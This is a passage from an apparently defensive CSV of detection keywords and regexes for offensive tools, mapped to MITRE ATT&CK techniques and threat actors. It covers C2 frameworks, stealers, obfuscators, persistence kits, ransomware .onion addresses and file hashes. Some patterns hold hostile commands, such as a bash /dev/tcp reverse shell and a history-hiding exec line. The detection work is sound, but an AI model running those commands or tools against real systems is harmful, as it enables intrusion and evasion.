Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","35268" "*BadWindowsService_v1.0.7z*",".{0,1000}BadWindowsService_v1\.0\.7z.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","35269" "*BadWindowsService_v1.0.zip*",".{0,1000}BadWindowsService_v1\.0\.zip.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","35270" "*BadZure-main*",".{0,1000}BadZure\-main.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","1","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","35271" "*bae4458b1ee612926f85169e02a903fb9b22d5a42f746ec210bdd02d15f7af6f*",".{0,1000}bae4458b1ee612926f85169e02a903fb9b22d5a42f746ec210bdd02d15f7af6f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open 
source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35272" "*BAE62044075CF4F76F0BAAD0FA33F6322541CC46F80C81170E97A181CAA43104*",".{0,1000}BAE62044075CF4F76F0BAAD0FA33F6322541CC46F80C81170E97A181CAA43104.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","35273" "*baf01db350b5f61816b02ee721cbbaacec195b68b492f715d03e65383d5c7ea7*",".{0,1000}baf01db350b5f61816b02ee721cbbaacec195b68b492f715d03e65383d5c7ea7.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35275" "*baf6deb599ee2e6cd817dbc447bdb4ea3cf9a585708c8c585f9a104ffba2b8d9*",".{0,1000}baf6deb599ee2e6cd817dbc447bdb4ea3cf9a585708c8c585f9a104ffba2b8d9.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","#filehash","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","35279" "*baf93de7d2d00045f677a77eeb729753c930f4d0be125a6f32db82cfe7592846*",".{0,1000}baf93de7d2d00045f677a77eeb729753c930f4d0be125a6f32db82cfe7592846.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","35280" "*bafb49c76d6541518e9f22b688d52ca60f4b8c4bf692c35652e8642429c62a7f*",".{0,1000}bafb49c76d6541518e9f22b688d52ca60f4b8c4bf692c35652e8642429c62a7f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35281" "*bananabr/TimeException*",".{0,1000}bananabr\/TimeException.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","1","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","35283" "*bananaKitten.exe*",".{0,1000}bananaKitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","35284" "*BaRMIe*",".{0,1000}BaRMIe.{0,1000}","offensive_tool_keyword","BaRMIe","BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.","T1522 - T1070 - T1573 - T1071","TA0001 - TA0003 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/NickstaDB/BaRMIe","1","0","N/A","N/A","N/A","8","731","97","2017-09-28T22:38:02Z","2017-09-24T18:54:12Z","35285" "*baron-samedit-heap-based-overflow-sudo.txt*",".{0,1000}baron\-samedit\-heap\-based\-overflow\-sudo\.txt.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","35286" "*base64(ticket.kirbi*",".{0,1000}base64\(ticket\.kirbi.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#content","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","35290" "*base64_conversion_commands.ps1*",".{0,1000}base64_conversion_commands\.ps1.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","35291" 
"*basemmnnqwxevlymli5bs36o5ynti55xojzvn246spahniugwkff2pad.onion*",".{0,1000}basemmnnqwxevlymli5bs36o5ynti55xojzvn246spahniugwkff2pad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","35292" "*bash ./bounce.sh*",".{0,1000}bash\s\.\/bounce\.sh.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","#linux","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","35293" "*bash extension_injection.sh*",".{0,1000}bash\sextension_injection\.sh.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#linux","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","35297" "*bash -i &>/dev/tcp/* <&1*",".{0,1000}bash\s\-i\s\&\>\/dev\/tcp\/.{0,1000}\s\<\&1.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","35298" "*bash lse.sh*",".{0,1000}bash\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - 
TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","35301" "*bash_executor *",".{0,1000}bash_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","0","#linux","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","35302" "*BASH_HISTORY=/dev/null exec -a *",".{0,1000}BASH_HISTORY\=\/dev\/null\sexec\s\-a\s.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#linux","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","35303" "*bash_read_line_reverse_tcp.py*",".{0,1000}bash_read_line_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","35304" "*bashfuscator -*",".{0,1000}bashfuscator\s\-.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","35305" "*Bashfuscator Team*",".{0,1000}Bashfuscator\sTeam.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","35306" "*bashfuscator.py*",".{0,1000}bashfuscator\.py.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","35307" "*Bashfuscator-master*",".{0,1000}Bashfuscator\-master.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","35308" 
"*bashRCPersistence*",".{0,1000}bashRCPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","35309" "*BasicServiceExploit.class*",".{0,1000}BasicServiceExploit\.class.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","35310" "*bastad5huzwkepdixedg2gekg7jk22ato24zyllp6lnjx7wdtyctgvyd.onion*",".{0,1000}bastad5huzwkepdixedg2gekg7jk22ato24zyllp6lnjx7wdtyctgvyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","35311" "*BastilleResearch*",".{0,1000}BastilleResearch.{0,1000}","offensive_tool_keyword","Github Username","Open source testing tools for the SDR & security community","T1179 - T1141 - T1142 - T1143","TA0011 - ","N/A","N/A","Exploitation tool","https://github.com/BastilleResearch","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","35312" "*--batch --dump -T *",".{0,1000}\-\-batch\s\-\-dump\s\-T\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","35313" "*Bates.exe 
--kill*",".{0,1000}Bates\.exe\s\-\-kill.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","35314" "*Bates.exe --listen*",".{0,1000}Bates\.exe\s\-\-listen.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","35315" "*Bat-Potato-main.zip*",".{0,1000}Bat\-Potato\-main\.zip.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","1","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","35316" "*bats3c/ADCSPwn*",".{0,1000}bats3c\/ADCSPwn.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","35317" "*bats3c/darkarmour*",".{0,1000}bats3c\/darkarmour.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching 
disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","35318" "*bats3c/DarkLoadLibrary*",".{0,1000}bats3c\/DarkLoadLibrary.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","N/A","10","10","1133","207","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z","35319" "*bats3c/EvtMute*",".{0,1000}bats3c\/EvtMute.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","35320" "*battle_net_stealer*",".{0,1000}battle_net_stealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","35321" "*bawait_upload*",".{0,1000}bawait_upload.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","35323" "*bawait_upload_raw*",".{0,1000}bawait_upload_raw.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","35324" "*bb01642e30001ee637c9d4fc341484c06eaba67e8ce00b52dc6faf71b2daecfc*",".{0,1000}bb01642e30001ee637c9d4fc341484c06eaba67e8ce00b52dc6faf71b2daecfc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35325" "*bb0234c8e7cb409a5032ac771706072ba1dfe49a72f934b11a0b0b6ef3437468*",".{0,1000}bb0234c8e7cb409a5032ac771706072ba1dfe49a72f934b11a0b0b6ef3437468.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35327" "*bb141fb92bcd492552d5d6c09fbf39f7f674eb49*",".{0,1000}bb141fb92bcd492552d5d6c09fbf39f7f674eb49.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","35331" "*bb1925f0abee8457796b7fcfa310bd00b37d46158c4f700da25a57ab062f5107*",".{0,1000}bb1925f0abee8457796b7fcfa310bd00b37d46158c4f700da25a57ab062f5107.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35332" "*bb205ccc783d22b06eac7ab9e5f2f14d793bf9b4ed6fe413f888463092ccf79a*",".{0,1000}bb205ccc783d22b06eac7ab9e5f2f14d793bf9b4ed6fe413f888463092ccf79a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of 
offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","35334" "*bb239dee17aad653557b3c981e16e0622772f560e1a25fedc97639f7431ad77b*",".{0,1000}bb239dee17aad653557b3c981e16e0622772f560e1a25fedc97639f7431ad77b.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","35335" "*bb2cfc48d0c06e32022593e6f3184d4e5b7b7c5f902938aad8f5d6181ac0d40d*",".{0,1000}bb2cfc48d0c06e32022593e6f3184d4e5b7b7c5f902938aad8f5d6181ac0d40d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35337" "*bb2dae47e442008e774626bfaa7fdeaec3eb2bacdf307d547b3205e2ecad3513*",".{0,1000}bb2dae47e442008e774626bfaa7fdeaec3eb2bacdf307d547b3205e2ecad3513.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","35338" "*bb33277d1d07b2dc6438e1a95eb4446d1c7a975ec0e70bb8f4b09fe1160205cd*",".{0,1000}bb33277d1d07b2dc6438e1a95eb4446d1c7a975ec0e70bb8f4b09fe1160205cd.{0,1000}","offensive_tool_keyword","chisel","A fast 
TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35339" "*bb3b1a1f-0447-42a6-955a-88681fb88499*",".{0,1000}bb3b1a1f\-0447\-42a6\-955a\-88681fb88499.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","C2","https://github.com/SpiderMate/Jatayu","1","0","#GUIDproject","N/A","N/A","10","33","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z","35340" "*bb3ef2dc534defdd43d7fd9968db67ca726d701c78dfd420a0b8ef9520d69daf*",".{0,1000}bb3ef2dc534defdd43d7fd9968db67ca726d701c78dfd420a0b8ef9520d69daf.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash 